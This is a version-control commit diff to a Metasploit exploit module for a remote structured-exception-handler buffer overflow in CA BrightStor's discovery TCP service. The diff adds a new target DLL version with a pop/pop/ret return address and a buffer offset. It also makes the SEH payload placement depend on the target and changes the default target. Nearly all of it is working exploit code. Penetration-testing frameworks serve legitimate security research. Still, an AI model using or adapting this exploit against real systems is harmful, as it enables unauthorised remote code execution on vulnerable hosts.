Added new target.

git-svn-id: file:///home/svn/framework3/trunk@5911 4d416f70-5f16-0410-b530-b9f4589650da
2008-11-13 08:31:04 +00:00 · 2008-11-13 08:31:04 +00:00 · 547f01f84a
parent 27667fc534
commit 547f01f84a
1 changed files with 14 additions and 4 deletions
--- a/modules/exploits/windows/brightstor/discovery_tcp.rb
+++ b/modules/exploits/windows/brightstor/discovery_tcp.rb
@ -50,11 +50,20 @@ class Metasploit3 < Msf::Exploit::Remote
 				},
 			'Targets'        => 
 				[
+					[
+						'cheyprod.dll 9/14/2000', # Build 1220.0 9/14/2000 7.0.1220.0
+						{
+							'Platform' => 'win',
+							'Ret'      => 0x23803b20, # pop/pop/ret
+							'Offset'   => 1032, 
+						},
+					],
 					[
 						'cheyprod.dll 12/12/2003',
 						{
 							'Platform' => 'win',
 							'Ret'      => 0x23805714, # pop/pop/ret
+							'Offset'   => 1024,
 						},
 					],
 					[
@ -62,11 +71,12 @@ class Metasploit3 < Msf::Exploit::Remote
 						{
 							'Platform' => 'win',
 							'Ret'      => 0x23805d10, # pop/pop/ret
+							'Offset'   => 1024,
 						},
 					],					
 				],
 			'DisclosureDate' => 'Feb 14 2005',
-			'DefaultTarget' => 0))
+			'DefaultTarget' => 1))
 			
 			register_options(
 				[
@ -122,8 +132,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		# the SEH frame instead, making things a bit easier.

 		seh = generate_seh_payload(target.ret)
-		buf[1024, seh.length] = seh
-		
+		buf[target['Offset'], seh.length] = seh
+
 		# Make sure the return address is invalid to trigger SEH
 		buf[ 900, 100]     = (rand(127)+128).chr * 100

@ -133,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote

 		sock.put(req)
 		sock.get_once
-			
+
 		handler
 		disconnect
 	end